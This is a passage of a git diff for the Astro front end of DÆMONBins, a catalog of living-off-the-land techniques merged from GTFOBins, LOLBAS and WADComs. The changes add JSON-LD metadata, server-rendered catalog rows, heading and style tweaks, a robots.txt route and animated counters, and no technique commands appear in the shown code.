'https://www.gnu.org/licenses/gpl-3.0.html'; + +const abs = (site: URL | undefined, path: string) => new URL(path, site ?? SITE_FALLBACK).href; + +const publisher = { + '@type': 'Organization', + name: 'DÆMON', + url: 'https://daemon-sec.xyz', +}; + +/** Home: the site + its search box (SearchAction → /catalog?q=). */ +export function website(site: URL | undefined): JsonLd { + const root = abs(site, '/'); + return { + '@context': 'https://schema.org', + '@type': 'WebSite', + '@id': `${root}#website`, + name: SITE_NAME, + alternateName: 'the Off-the-Land Almanac', + url: root, + publisher, + license: GPL, + potentialAction: { + '@type': 'SearchAction', + target: { '@type': 'EntryPoint', urlTemplate: `${abs(site, '/catalog')}?q={search_term_string}` }, + 'query-input': 'required name=search_term_string', + }, + }; +} + +/** The merged dataset itself — on /credits and the catalog. */ +export function dataset( + site: URL | undefined, + counts: { techniques: number; tools: number; bySource?: Record<string, number> }, + commits?: Record<string, string | null | undefined>, +): JsonLd { + const upstream: SourceId[] = SOURCES.filter((s) => s !== 'DAEMON'); + return { + '@context': 'https://schema.org', + '@type': 'Dataset', + '@id': `${abs(site, '/')}#dataset`, + name: `${SITE_NAME} technique index`, + description: `${counts.techniques} living-off-the-land and offensive techniques across ${counts.tools} tools, merged from GTFOBins, LOLBAS and WADComs with DÆMON-authored additions; each mapped to MITRE ATT&CK.`, + url: abs(site, '/catalog'), + license: GPL, + isAccessibleForFree: true, + creator: publisher, + keywords: ['living off the land', 'LOLBins', 'GTFOBins', 'LOLBAS', 'WADComs', 'MITRE ATT&CK', 'privilege escalation'], + isBasedOn: upstream.map((id) => { + const s = SOURCE_META[id]; + const sha = commits?.[id.toLowerCase()]; + return { + '@type': 'Dataset', + name: s.label, + url: s.homepage, + sameAs: s.repo, + license: GPL, + ...(sha ? { version: sha } : {}), + }; + }), + distribution: [{ + '@type': 'DataDownload', + encodingFormat: 'application/json', + contentUrl: abs(site, '/data/techniques.json'), + }], + }; +} + +/** /catalog and the deck indexes. */ +export function collectionPage(site: URL | undefined, path: string, name: string, description: string): JsonLd { + return { + '@context': 'https://schema.org', + '@type': 'CollectionPage', + name, + description, + url: abs(site, path), + isPartOf: { '@id': `${abs(site, '/')}#website` }, + about: { '@id': `${abs(site, '/')}#dataset` }, + }; +} + +/** Catalog → Source → Tool. */ +export function breadcrumbs(site: URL | undefined, items: { name: string; path: string }[]): JsonLd { + return { + '@context': 'https://schema.org', + '@type': 'BreadcrumbList', + itemListElement: items.map((it, i) => ({ + '@type': 'ListItem', + position: i + 1, + name: it.name, + item: abs(site, it.path), + })), + }; +} + +/** One tool page: the binary and its techniques as a TechArticle. */ +export function techArticle( + site: URL | undefined, + path: string, + tool: Tool, + techniques: Technique[], + source: SourceId, +): JsonLd { + const s = SOURCE_META[source]; + const caps = [...new Set(techniques.flatMap((t) => t.capability))]; + const mitre = [...new Set(techniques.flatMap((t) => t.mitre || []))]; + const platforms = [...new Set(techniques.flatMap((t) => t.platform))]; + const upstream = tool.references?.find((r) => /gtfobins|lolbas|wadcoms/.test(r)) || s.homepage; + return { + '@context': 'https://schema.org', + '@type': 'TechArticle', + headline: `${tool.name} — ${s.label}`, + name: tool.name, + description: `${tool.name}: ${techniques.length} living-off-the-land technique${techniques.length === 1 ? '' : 's'} from ${s.label}. Commands, MITRE ATT&CK mapping, detection and references.`, + url: abs(site, path), + mainEntityOfPage: abs(site, path), + inLanguage: 'en', + isPartOf: { '@id': `${abs(site, '/')}#website` }, + articleSection: s.label, + keywords: [tool.name, ...caps, ...platforms, ...(tool.aliases || [])], + about: mitre.map((id) => ({ + '@type': 'Thing', + name: `MITRE ATT&CK ${id}`, + url: `https://attack.mitre.org/techniques/${id.replace('.', '/')}/`, + })), + isBasedOn: upstream, + license: GPL, + author: { '@type': 'Organization', name: s.author.replace(/\s*&\s*contributors$/, ''), url: s.homepage }, + publisher, + ...(tool.created ? { dateCreated: tool.created } : {}), + }; +} + +/** + * Serialise for an inline <script type="application/ld+json">. `<` is escaped + * so upstream text (tool descriptions, names) can never close the script tag. + */ +export function serialize(ld: JsonLd | JsonLd[]): string { + return JSON.stringify(ld).replace(/</g, '\\u003c'); +} diff --git a/src/lib/render-row.ts b/src/lib/render-row.ts @@ -0,0 +1,116 @@ +// Pure renderers shared by the catalog island (client) and catalog.astro +// (server-rendered first page): chips, badges, one technique row. No DOM, no +// side effects — the same function builds the SSR'd rows and the fetched ones, +// which is what lets the island adopt the server's markup without a re-render. + +import { toolRoute, type Technique } from './techniques'; +import { PLATFORMS, CAPABILITIES, SOURCES, PLATFORM_META, CAPABILITY_META, SOURCE_META } from './taxonomy'; +import { escapeHtml as esc, highlightCommand } from './highlight'; +import { url } from './url'; + +/** Rows per page, server and client alike. */ +export const PAGE = 40; + +/** + * The fields the list view needs — exactly what public/data/index-<hash>.json + * carries (scripts/build-index.mjs keeps an identical list; a test pins them + * together). Everything the text query scans is here, so search behaves the + * same as over the full record; detection, references, paths and the rest + * live on the tool page the row links to. + */ +export const LIST_FIELDS = [ + 'id', 'toolId', 'toolName', 'name', 'source', 'platform', 'capability', 'nativeCategory', + 'command', 'description', 'usecase', 'mitre', 'privilege', 'added', +] as const; +export type ListTechnique = Pick<Technique, (typeof LIST_FIELDS)[number]>; + +export function toListTechnique(t: Technique): ListTechnique { + const out: Partial<Record<(typeof LIST_FIELDS)[number], unknown>> = {}; + for (const k of LIST_FIELDS) if (t[k] !== undefined) out[k] = t[k]; + return out as ListTechnique; +} + +// ---- chips ----------------------------------------------------------------- +export function chip(kind: string, value: string, label: string, accent: string, active: boolean, count: number): string { + return `<button type="button" class="cat-chip" role="checkbox" aria-checked="${active}" data-facet="${kind}" data-value="${esc(value)}" style="--acc: var(--${accent});"> + <span class="cat-chip__lbl">${esc(label)}</span><span class="cat-chip__n">${count}</span></button>`; +} + +export function facetGroup(title: string, kind: string, values: readonly string[], meta: (v: string) => string, active: string[], counts: Record<string, number>): string { + const chips = values.filter((v) => counts[v]).map((v) => chip(kind, v, v, meta(v), active.includes(v), counts[v] || 0)).join(''); + return `<section class="cat-facet"><p class="cat-facet__head eyebrow"><span class="eyebrow__mark">^:</span><span>${esc(title)}</span></p><div class="cat-facet__chips">${chips}</div></section>`; +} + +export interface FacetCounts { platform: Record<string, number>; capability: Record<string, number>; source: Record<string, number> } + +/** The whole facet rail: three groups, chip counts are dataset totals. */ +export function renderFacets(active: { platform: string[]; capability: string[]; source: string[] }, counts: FacetCounts): string { + return ( + facetGroup('Platform', 'platform', PLATFORMS, (v) => PLATFORM_META[v as keyof typeof PLATFORM_META].accent, active.platform, counts.platform) + + facetGroup('Capability', 'capability', CAPABILITIES, (v) => CAPABILITY_META[v]?.accent || 'foam', active.capability, counts.capability) + + facetGroup('Source', 'source', SOURCES, (v) => SOURCE_META[v as keyof typeof SOURCE_META].accent, active.source, counts.source) + ); +} + +// ---- badges ---------------------------------------------------------------- +export const badge = (label: string, accent: string, extra = '') => + `<span class="tbadge ${extra}" style="--acc: var(--${accent});">${esc(label)}</span>`; + +// ---- row ------------------------------------------------------------------- +/** A DOM id for the detail panel so the expander can name what it controls. */ +export const panelId = (id: string) => `td-${id.replace(/[^A-Za-z0-9_-]+/g, '-')}`; + +export function renderRow(t: ListTechnique): string { + const caps = t.capability.map((c) => badge(c, CAPABILITY_META[c]?.accent || 'foam')).join(''); + const plats = t.platform.map((p) => badge(p, PLATFORM_META[p]?.accent || 'foam', 'tbadge--soft')).join(''); + const src = SOURCE_META[t.source]; + const srcBadge = badge(src.label, src.accent, 'tbadge--src'); + const newBadge = t.added ? `<span class="tbadge tbadge--new" style="--acc: var(--love);">NEW</span>` : ''; + const label = t.name && t.name !== t.toolName ? `<span class="trow__sub">${esc(t.name)}</span>` : ''; + const route = url(toolRoute(t.toolId)); + const pid = panelId(t.id); + + const mitre = t.mitre?.length ? `<div class="tdetail__row"><span class="tdetail__k">MITRE</span><span class="tdetail__v">${t.mitre.map((m) => `<a href="https://attack.mitre.org/techniques/${esc(m.replace('.', '/'))}/" target="_blank" rel="noopener" class="tchip-link">${esc(m)}</a>`).join(' ')}</span></div>` : ''; + const priv = t.privilege ? `<div class="tdetail__row"><span class="tdetail__k">Context</span><span class="tdetail__v">${esc(t.privilege)}</span></div>` : ''; + const desc = t.description ? `<p class="tdetail__desc">${esc(t.description)}</p>` : ''; + const use = t.usecase ? `<p class="tdetail__use"><span class="tdetail__k">Use</span> ${esc(t.usecase)}</p>` : ''; + const more = `<a class="tdetail__more" href="${route}#${esc(t.id)}">Full details on the ${esc(t.toolName)} page — detection, references, paths →</a>`; + + return `<article class="trow" data-id="${esc(t.id)}"> + <button class="trow__head" type="button" aria-expanded="false" aria-controls="${pid}"> + <span class="trow__chev" aria-hidden="true">›</span> + <span class="trow__name"><a href="${route}" class="trow__tool">${esc(t.toolName)}</a>${label}</span> + <span class="trow__badges">${srcBadge}${newBadge}${caps}${plats}</span> + </button> + <div class="trow__cmdbar" data-cmdbar> + <pre class="trow__cmd"><code>${highlightCommand(t.command)}</code></pre> + <button class="trow__copy" type="button" data-copy aria-label="Copy command">copy</button> + </div> + <div class="trow__detail" id="${pid}" hidden> + ${desc}${use} + <div class="tdetail__grid">${priv}${mitre}</div> + ${more} + </div> + </article>`; +} + +export const EMPTY_HTML = `<div class="cat-empty"><p class="eyebrow" style="--acc: var(--love);"><span class="eyebrow__mark">^:</span><span>No matches</span></p><p>Nothing matches this filter. Loosen a facet or clear the search.</p></div>`; + +/** The count line and the "Show more" label, so server and client agree. */ +export function countLabel(shown: number, total: number, activeFacets: number, addedOnly: boolean): string { + return `<strong>${shown}</strong> of ${total} techniques${activeFacets ? ` · ${String(activeFacets).padStart(2, '0')} facet${activeFacets > 1 ? 's' : ''}` : ''}${addedOnly ? ' · NEW only' : ''}`; +} +export function moreLabel(remaining: number): string { + return `Show ${Math.min(remaining, PAGE)} more · ${remaining} remaining`; +} + +/** + * The same fields lib/techniques.ts#matchesQuery scans, lowercased once per + * record at boot instead of once per record per keystroke. + */ +export function haystack(t: ListTechnique): string { + return [t.toolName, t.name, t.command, t.description, t.usecase, ...(t.nativeCategory || []), ...(t.mitre || [])] + .filter(Boolean) + .join(' ') + .toLowerCase(); +} diff --git a/src/pages/[source]/[tool].astro b/src/pages/[source]/[tool].astro @@ -8,6 +8,7 @@ import type { Technique, Tool } from '../../lib/techniques'; import { SOURCE_ROUTE, SOURCE_META, PLATFORM_META, CAPABILITY_META } from '../../lib/taxonomy'; import { highlightCommand } from '../../lib/highlight'; import { url } from '../../lib/url'; +import { techArticle, breadcrumbs } from '../../lib/jsonld'; import '../../styles/catalog.css'; export async function getStaticPaths() { @@ -40,10 +41,21 @@ const { tool, techniques } = Astro.props; // badges convey which rows are daemon-authored. const src = SOURCE_META[routeSourceOf(tool.id)]; const upstream = tool.references?.find((r) => /gtfobins|lolbas|wadcoms/.test(r)) || src.homepage; +const deck = SOURCE_ROUTE[routeSourceOf(tool.id)]; +const path = `/${deck}/${toolSlug(tool.id)}`; +const jsonLd = [ + techArticle(Astro.site, path, tool, techniques, routeSourceOf(tool.id)), + breadcrumbs(Astro.site, [ + { name: 'Catalog', path: '/catalog' }, + { name: src.label, path: `/${deck}` }, + { name: tool.name, path }, + ]), +]; --- <Base title={`${tool.name} — ${src.label} — DÆMONBins`} - description={`${tool.name}: ${techniques.length} living-off-the-land technique${techniques.length > 1 ? 's' : ''} from ${src.label}. Commands, MITRE ATT&CK mapping, detection and references.`} + description={`${tool.name}: ${techniques.length} living-off-the-land technique${techniques.length === 1 ? '' : 's'} from ${src.label}. Commands, MITRE ATT&CK mapping, detection and references.`} + jsonLd={jsonLd} > <div class="wrap tool" style="padding-top:1.5rem;" data-pagefind-body> <span class="sr-only" data-pagefind-meta={`source:${src.label}`}></span> @@ -55,7 +67,7 @@ const upstream = tool.references?.find((r) => /gtfobins|lolbas|wadcoms/.test(r)) <SlantTitle eyebrow={`${src.tag} · ${tool.toolType || 'Tool'}`} title={tool.name} tone={src.accent}> <Fragment slot="meta"> - <span>{techniques.length} technique{techniques.length > 1 ? 's' : ''}</span> + <span>{techniques.length} technique{techniques.length === 1 ? '' : 's'}</span> {tool.platform?.length ? <span>{tool.platform.join(' · ')}</span> : null} <span>{src.label}</span> <span>GPL-3.0</span> @@ -80,10 +92,10 @@ const upstream = tool.references?.find((r) => /gtfobins|lolbas|wadcoms/.test(r)) <div class="tool__techs"> {techniques.map((t) => ( - <article class="tech"> + <article class="tech" id={t.id}> <header class="tech__head"> <div class="tech__title"> - {t.name && t.name !== t.toolName ? <span class="tech__name">{t.name}</span> : <span class="tech__name">{t.capability[0]}</span>} + <h2 class="tech__name">{t.name && t.name !== t.toolName ? t.name : t.capability[0]}</h2> {t.added ? <span class="tbadge tbadge--new" style="--acc: var(--love);">NEW</span> : null} </div> <div class="tech__badges"> @@ -136,10 +148,13 @@ const upstream = tool.references?.find((r) => /gtfobins|lolbas|wadcoms/.test(r)) .tool__facts dd.mono { font-family: var(--font-mono); font-size: 12px; } .tool__facts a { color: var(--accent); text-decoration: none; } .tool__techs { display: flex; flex-direction: column; gap: 1px; background: var(--rule); border: 1px solid var(--rule); } - .tech { background: var(--bg); padding: 1.1rem 1.2rem; } + .tech { background: var(--bg); padding: 1.1rem 1.2rem; scroll-margin-top: 5.5rem; } + /* The catalog's "full details" link lands here by #id — mark the row it meant. */ + .tech:target { box-shadow: inset 3px 0 0 var(--accent); } .tech__head { display: flex; flex-wrap: wrap; align-items: center; justify-content: space-between; gap: 0.6rem; margin-bottom: 0.7rem; } .tech__title { display: flex; align-items: center; gap: 0.5rem; } - .tech__name { font-family: var(--font-archivo); font-weight: 700; font-size: 16px; letter-spacing: -0.01em; color: var(--fg); } + /* An h2 so the techniques form a real outline under the tool's h1; styled as the label it always was. */ + .tech__name { margin: 0; font-family: var(--font-archivo); font-weight: 700; font-size: 16px; line-height: 1.3; letter-spacing: -0.01em; text-transform: none; color: var(--fg); } .tech__badges { display: flex; flex-wrap: wrap; gap: 0.3rem; } .tech__desc { margin: 0 0 0.7rem; font-size: 14px; line-height: 1.6; color: var(--fg-dim); max-width: 74ch; white-space: pre-wrap; } .tech__use { margin: 0 0 0.7rem; font-size: 13px; color: var(--fg-dim); } diff --git a/src/pages/[source]/index.astro b/src/pages/[source]/index.astro @@ -70,5 +70,5 @@ const stats = [ .src__tname { font-family: var(--font-archivo); font-weight: 600; font-size: 14px; letter-spacing: -0.01em; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; } .src__tmeta { display: flex; align-items: center; gap: 0.3rem; flex-shrink: 0; } .src__tcount { font-family: var(--font-mono); font-size: 11px; color: var(--fg-dim); } - .src__tplat { font-family: var(--font-mono); font-size: 8.5px; letter-spacing: 0.06em; color: var(--fg-faint); border: 1px solid var(--rule); padding: 0.05rem 0.25rem; } + .src__tplat { font-family: var(--font-mono); font-size: 11px; letter-spacing: 0.06em; color: var(--fg-faint); border: 1px solid var(--rule); padding: 0.05rem 0.25rem; } </style> diff --git a/src/pages/catalog.astro b/src/pages/catalog.astro @@ -2,13 +2,32 @@ import Base from '../layouts/Base.astro'; import SlantTitle from '../components/SlantTitle.astro'; import facets from '../data/facets.json'; +import allTechniques from '../data/techniques.json'; +import indexHash from '../data/index-hash.json'; +import type { Technique } from '../lib/techniques'; +import { PAGE, renderRow, renderFacets, toListTechnique, countLabel, moreLabel } from '../lib/render-row'; +import { collectionPage } from '../lib/jsonld'; +import { url } from '../lib/url'; import '../styles/catalog.css'; const c = facets.counts; +const DESCRIPTION = "The Off-the-Land Almanac: every technique from GTFOBins, LOLBAS and WADComs, plus DÆMON's modern additions, as one filterable index by platform, capability and source."; + +// The first page and the facet rail are rendered here with the island's own +// renderers (src/lib/render-row.ts) so the catalog has content before — and +// without — JavaScript, and crawlers see real rows. The island adopts this +// markup on a plain load and only fetches the slim index to filter. +const techs = allTechniques as unknown as Technique[]; +const firstPage = techs.slice(0, PAGE).map((t) => renderRow(toListTechnique(t))).join(''); +const remaining = techs.length - Math.min(PAGE, techs.length); +const rail = renderFacets({ platform: [], capability: [], source: [] }, { + platform: c.byPlatform, capability: c.byCapability, source: c.bySource, +}); --- <Base title="Catalog — DÆMONBins" - description="The Off-the-Land Almanac: every technique from GTFOBins, LOLBAS and WADComs, plus DÆMON's modern additions, as one filterable index by platform, capability and source." + description={DESCRIPTION} + jsonLd={collectionPage(Astro.site, '/catalog', 'Catalog — DÆMONBins', DESCRIPTION)} > <div class="wrap" style="padding-top:1.5rem;"> <SlantTitle @@ -25,7 +44,7 @@ const c = facets.counts; </Fragment> </SlantTitle> - <div class="cat" data-catalog> + <div class="cat" data-catalog data-index-url={url(`data/${indexHash.file}`)}> <aside class="cat__rail"> <div class="cat__searchrow"> <input class="cat__search" data-cat-search type="search" placeholder="search commands, tools, MITRE…" aria-label="Search techniques" /> @@ -34,12 +53,12 @@ const c = facets.counts; <button class="cat__btn" data-cat-new type="button" aria-pressed="false">NEW only</button> <button class="cat__btn" data-cat-clear type="button">Clear</button> </div> - <div class="cat__facets" data-cat-facets></div> + <div class="cat__facets" data-cat-facets data-ssr set:html={rail}></div> </aside> <div class="cat__main"> - <div class="cat__meta" data-cat-count>Loading the index…</div> - <div class="cat__results" data-cat-results></div> - <div class="cat__morerow"><button class="cat__more" data-cat-more type="button" hidden></button></div> + <div class="cat__meta" data-cat-count aria-live="polite" set:html={countLabel(techs.length, techs.length, 0, false)}></div> + <div class="cat__results" data-cat-results data-ssr set:html={firstPage}></div> + <div class="cat__morerow"><button class="cat__more" data-cat-more type="button" hidden={remaining <= 0}>{moreLabel(remaining)}</button></div> </div> </div> </div> diff --git a/src/pages/credits.astro b/src/pages/credits.astro @@ -3,6 +3,7 @@ import Base from '../layouts/Base.astro'; import SlantTitle from '../components/SlantTitle.astro'; import facets from '../data/facets.json'; import { SOURCE_META } from '../lib/taxonomy'; +import { dataset } from '../lib/jsonld'; const c = facets.counts; const commits = facets.commits as Record<string, string>; @@ -28,6 +29,7 @@ const CREDITS = [ <Base title="Credits & Licenses — DÆMONBins" description="Attribution and GPL-3.0 licensing for GTFOBins, LOLBAS and WADComs, the three projects merged into DÆMONBins, plus the DÆMON additions." + jsonLd={dataset(Astro.site, c, commits)} > <div class="wrap prose credits" style="max-width:60rem; padding: 2rem 0 5rem;"> <SlantTitle eyebrow="05 · Credits" title="Credits & Licenses" tone="gold" /> diff --git a/src/pages/index.astro b/src/pages/index.astro @@ -1,11 +1,12 @@ --- import Base from '../layouts/Base.astro'; -import SlantTitle from '../components/SlantTitle.astro'; +import HeroDeck from '../components/HeroDeck.astro'; import Marquee from '../components/Marquee.astro'; import Callout from '../components/Callout.astro'; import facets from '../data/facets.json'; -import { SOURCES, SOURCE_META, SOURCE_ROUTE } from '../lib/taxonomy'; +import { SOURCES, SOURCE_META, SOURCE_ROUTE, PLATFORMS, PLATFORM_META } from '../lib/taxonomy'; import { url } from '../lib/url'; +import { website, dataset } from '../lib/jsonld'; const c = facets.counts; @@ -27,48 +28,51 @@ const marqueeMeta = [ { tag: 'mitre', text: 'ATT&CK mapped', accent: 'pine' }, { tag: 'gpl', text: 'GPL-3.0', accent: 'rose' }, ]; + +const platformStats = PLATFORMS.filter((p) => c.byPlatform[p]).map((p) => ({ + label: p, + accent: PLATFORM_META[p].accent, + n: c.byPlatform[p], +})); --- <Base title="DÆMONBins — the Off-the-Land Almanac" description="One filterable catalog merging GTFOBins, LOLBAS and WADComs — plus DÆMON's fact-checked modern additions. Living-off-the-land and offensive techniques by platform, capability and source." + jsonLd={[website(Astro.site), dataset(Astro.site, c, facets.commits)]} > - <section class="home-hero wrap"> - <SlantTitle - eyebrow="00 · DÆMONBins" - title="Off-the-Land Almanac" - tone="love" - intro="Three of the field's living-off-the-land references — GTFOBins, LOLBAS and WADComs — merged into one filterable catalog, resynced to their latest, and extended with DÆMON's own fact-checked, referenced modern additions. Every technique is placeholder-only reference material, mapped to MITRE ATT&CK, and filterable by platform, capability and source." - > - <Fragment slot="meta"> - <span>{c.techniques.toLocaleString()} techniques</span> - <span>{c.tools.toLocaleString()} tools</span> - <span>4 sources</span> - <span>GPL-3.0</span> - </Fragment> - </SlantTitle> - - <div class="home-cta"> - <a class="home-cta__go" href={url('catalog')}>Open the catalog →</a> - <span class="home-cta__hint">or press <kbd>/</kbd> to search</span> - </div> - </section> + <HeroDeck /> <Marquee titles={marqueeTitles} meta={marqueeMeta} manifest={`${c.techniques} techniques`} /> - <section class="home-stats wrap"> - <div class="home-stat"><b>{c.techniques.toLocaleString()}</b><span>Techniques</span></div> - <div class="home-stat"><b>{c.tools.toLocaleString()}</b><span>Tools / binaries</span></div> - <div class="home-stat"><b>{Object.keys(c.byPlatform).length}</b><span>Platforms</span></div> - <div class="home-stat"><b>{c.added}</b><span>DÆMON additions</span></div> + <section class="home-platforms wrap"> + <h2 class="eyebrow" style="--acc: var(--foam);"> + <span class="eyebrow__n">01</span> + <span class="eyebrow__mark">^:</span> + <span>By platform</span> + <span class="eyebrow__rule" aria-hidden="true"></span> + </h2> + <div class="home-platforms__grid"> + {platformStats.map((p) => ( + <div class="home-platstat" data-reveal style={`--acc: var(--${p.accent});`}> + <b data-count={p.n}>{p.n.toLocaleString()}</b> + <span>{p.label}</span> + </div> + ))} + </div> </section> <section class="home-sources wrap"> - <p class="eyebrow" style="--acc: var(--iris);"><span class="eyebrow__mark">^:</span><span>The four decks</span></p> + <h2 class="eyebrow" style="--acc: var(--iris);"> + <span class="eyebrow__n">02</span> + <span class="eyebrow__mark">^:</span> + <span>The four decks</span> + <span class="eyebrow__rule" aria-hidden="true"></span> + </h2> <div class="home-sources__grid"> {SOURCES.map((id, i) => { const s = SOURCE_META[id]; return ( - <a class="home-source" href={url(SOURCE_ROUTE[id])} style={`--acc: var(--${s.accent});`}> + <a class="home-source" data-reveal href={url(SOURCE_ROUTE[id])} style={`--acc: var(--${s.accent});`}> <div class="home-source__top"> <span class="home-source__tag">{String(i + 1).padStart(2, '0')} · {s.tag}</span> <span class="home-source__n">{c.bySource[id] ?? 0}</span> @@ -95,33 +99,88 @@ const marqueeMeta = [ </Base> <style> - .home-hero { padding: 3rem 0 1.5rem; } - .home-cta { margin-top: 2.25rem; display: flex; flex-wrap: wrap; align-items: center; gap: 1rem; } - .home-cta__go { font-family: var(--font-archivo); font-weight: 700; font-stretch: 82%; text-transform: uppercase; letter-spacing: 0.02em; font-size: 15px; padding: 0.7rem 1.4rem; background: var(--love); color: var(--base); text-decoration: none; } - .home-cta__go:hover { background: var(--fg); } - .home-cta__hint { font-family: var(--font-mono); font-size: 12px; color: var(--fg-dim); } - .home-cta__hint kbd { font-family: var(--font-mono); border: 1px solid var(--rule); padding: 0.05rem 0.35rem; } + /* The section eyebrows are h2s so the page outlines h1 → h2 → h3 for + heading navigation; they keep the <p> eyebrow's metrics exactly. */ + h2.eyebrow { margin: 1em 0; font-weight: 400; } - .home-stats { display: grid; grid-template-columns: repeat(4, 1fr); gap: 1px; background: var(--rule); border: 1px solid var(--rule); margin: 3rem auto; } - @media (max-width: 640px) { .home-stats { grid-template-columns: repeat(2, 1fr); } } - .home-stat { background: var(--bg); padding: 1.5rem 1.2rem; text-align: left; } - .home-stat b { display: block; font-family: var(--font-archivo); font-weight: 800; font-size: clamp(28px, 4vw, 44px); letter-spacing: -0.03em; color: var(--fg); } - .home-stat span { font-family: var(--font-mono); font-size: 10.5px; letter-spacing: 0.14em; text-transform: uppercase; color: var(--fg-faint); } + /* ---- By platform -------------------------------------------------------- */ + .home-platforms { margin: clamp(2.6rem, 5vw, 4rem) auto 0; } + .home-platforms__grid { + margin-top: 1rem; + display: grid; + grid-template-columns: repeat(4, 1fr); + gap: 1px; + background: var(--rule); + border: 1px solid var(--rule); + } + @media (max-width: 560px) { .home-platforms__grid { grid-template-columns: repeat(2, 1fr); } } + .home-platstat { + background: var(--bg); + padding: 1.4rem 1.2rem; + border-top: 2px solid var(--acc); + } + .home-platstat b { + display: block; + font-family: var(--font-display); + font-weight: 800; + font-stretch: 84%; + font-size: clamp(1.8rem, 4vw, 2.7rem); + letter-spacing: -0.03em; + line-height: 1; + color: var(--acc); + font-variant-numeric: tabular-nums; + } + .home-platstat span { + display: block; + margin-top: 0.4rem; + font-family: var(--font-mono); + font-size: 11px; + letter-spacing: 0.14em; + text-transform: uppercase; + color: var(--fg-faint); + } - .home-sources { margin: 4rem auto; } - .home-sources__grid { display: grid; grid-template-columns: repeat(2, 1fr); gap: 1px; background: var(--rule); border: 1px solid var(--rule); margin-top: 1rem; } + /* ---- The four decks ----------------------------------------------------- */ + .home-sources { margin: clamp(2.6rem, 5vw, 4rem) auto 0; } + .home-sources__grid { + display: grid; + grid-template-columns: repeat(2, 1fr); + gap: 1px; + background: var(--rule); + border: 1px solid var(--rule); + margin-top: 1rem; + } @media (max-width: 720px) { .home-sources__grid { grid-template-columns: 1fr; } } - .home-source { display: flex; flex-direction: column; gap: 0.6rem; padding: 1.5rem 1.5rem 1.4rem; background: var(--bg); text-decoration: none; color: var(--fg); position: relative; } - .home-source::before { content: ''; position: absolute; top: 0; left: 0; width: 100%; height: 3px; background: var(--acc); transform: scaleX(0); transform-origin: left; transition: transform 180ms var(--ease); } + .home-source { + display: flex; + flex-direction: column; + gap: 0.6rem; + padding: 1.5rem 1.5rem 1.4rem; + background: var(--bg); + text-decoration: none; + color: var(--fg); + position: relative; + } + .home-source::before { + content: ''; + position: absolute; + top: 0; left: 0; + width: 100%; height: 3px; + background: var(--acc); + transform: scaleX(0); + transform-origin: left; + transition: transform 220ms var(--ease); + } .home-source:hover::before { transform: scaleX(1); } .home-source__top { display: flex; align-items: center; justify-content: space-between; } - .home-source__tag { font-family: var(--font-mono); font-size: 10px; letter-spacing: 0.14em; text-transform: uppercase; color: var(--acc); } + .home-source__tag { font-family: var(--font-mono); font-size: 11px; letter-spacing: 0.14em; text-transform: uppercase; color: var(--acc); } .home-source__n { font-family: var(--font-mono); font-size: 12px; color: var(--fg-faint); } - .home-source__name { font-family: var(--font-archivo); font-weight: 800; font-stretch: 84%; text-transform: uppercase; letter-spacing: -0.02em; font-size: clamp(24px, 3.5vw, 34px); margin: 0; color: var(--fg); } + .home-source__name { font-family: var(--font-display); font-weight: 800; font-stretch: 84%; text-transform: uppercase; letter-spacing: -0.02em; font-size: clamp(24px, 3.5vw, 34px); margin: 0; color: var(--fg); } .home-source__blurb { margin: 0; font-size: 13.5px; line-height: 1.55; color: var(--fg-dim); } .home-source__go { margin-top: auto; font-family: var(--font-mono); font-size: 11px; letter-spacing: 0.08em; text-transform: uppercase; color: var(--acc); } - .home-scope { margin: 4rem auto 5rem; } + /* ---- Scope -------------------------------------------------------------- */ + .home-scope { margin: clamp(2.6rem, 5vw, 4rem) auto 5rem; } .home-scope__cred { margin-top: 1rem; font-size: 13px; color: var(--fg-dim); } .home-scope__cred a { color: var(--accent); } </style> diff --git a/src/pages/robots.txt.ts b/src/pages/robots.txt.ts @@ -0,0 +1,18 @@ +import type { APIRoute } from 'astro'; + +/** + * robots.txt, generated from `site` in astro.config.mjs so the Sitemap line + * always matches the deployed origin — nothing to keep in sync by hand. The + * catalog is public reference material, so everything is crawlable. + */ +export const GET: APIRoute = ({ site }) => { + const sitemap = site ? new URL('sitemap-index.xml', site).href : '/sitemap-index.xml'; + const body = `User-agent: * +Allow: / + +Sitemap: ${sitemap} +`; + return new Response(body, { + headers: { 'Content-Type': 'text/plain; charset=utf-8' }, + }); +}; diff --git a/src/scripts/app.ts b/src/scripts/app.ts @@ -1,5 +1,8 @@ // Progressive enhancement, re-run after every (view-transition) navigation. +import { initFuzz } from './fuzz'; +import { initHero } from './hero'; + function applyTheme(next: 'light' | 'dark'): void { document.documentElement.setAttribute('data-theme', next); try { localStorage.setItem('theme', next); } catch {} @@ -67,7 +70,7 @@ function initMobileNav(): void { }); toggle.closest('.site-header')?.addEventListener('keydown', (event) => { - if (event.key !== 'Escape' || toggle.getAttribute('aria-expanded') !== 'true') return; + if ((event as KeyboardEvent).key !== 'Escape' || toggle.getAttribute('aria-expanded') !== 'true') return; setOpen(false); toggle.focus(); }); @@ -149,6 +152,7 @@ function initUnscramble(): void { function initScrollReveal(): void { const reduced = window.matchMedia('(prefers-reduced-motion: reduce)').matches; const nodes = document.querySelectorAll<HTMLElement>([ + '[data-reveal]:not([data-reveal-bound])', '.subcat:not([data-reveal-bound])', '.download-library__head:not([data-reveal-bound])', '.record:not([data-reveal-bound])', @@ -191,6 +195,51 @@ function initScrollReveal(): void { }); } +/** + * Roll every `[data-count]` number up from zero to its target the first time it + * scrolls into view. The final value is server-rendered as the element's text, + * so with JS off (or under reduced motion) the real number is always shown; the + * animation only replaces it briefly. Used by the hero stats and the platform + * ledger. + */ +function initCounters(): void { + const nodes = document.querySelectorAll<HTMLElement>('[data-count]:not([data-count-bound])'); + if (!nodes.length) return; + const reduced = window.matchMedia('(prefers-reduced-motion: reduce)').matches; + + const run = (el: HTMLElement): void => { + const target = parseInt(el.dataset.count || '0', 10) || 0; + if (reduced) { el.textContent = target.toLocaleString(); return; } + const dur = 1100; + const start = performance.now(); + const tick = (now: number): void => { + const p = Math.min(1, (now - start) / dur); + const eased = 1 - Math.pow(1 - p, 3); + el.textContent = Math.round(target * eased).toLocaleString(); + if (p < 1) requestAnimationFrame(tick); + else el.textContent = target.toLocaleString(); + }; + requestAnimationFrame(tick); + }; + + const observer = !reduced && 'IntersectionObserver' in window + ? new window.IntersectionObserver((entries, current) => { + entries.forEach((entry) => { + if (!entry.isIntersecting) return; + run(entry.target as HTMLElement); + current.unobserve(entry.target); + }); + }, { rootMargin: '0px 0px -8% 0px', threshold: 0.4 }) + : null; + + nodes.forEach((node) => { + node.dataset.countBound = '1'; + const rect = 